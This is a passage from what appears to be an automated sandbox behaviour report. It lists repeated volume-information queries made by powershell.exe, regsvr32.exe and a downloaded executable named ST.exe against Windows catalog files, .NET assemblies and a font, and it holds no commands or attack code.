Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\Downloads\ST.exe	Queries volume information: C:\Users\user\Downloads\ST.exe VolumeInformation
Source: C:\Users\user\Downloads\ST.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Downloads\ST.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Downloads\ST.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Downloads\ST.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Downloads\ST.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
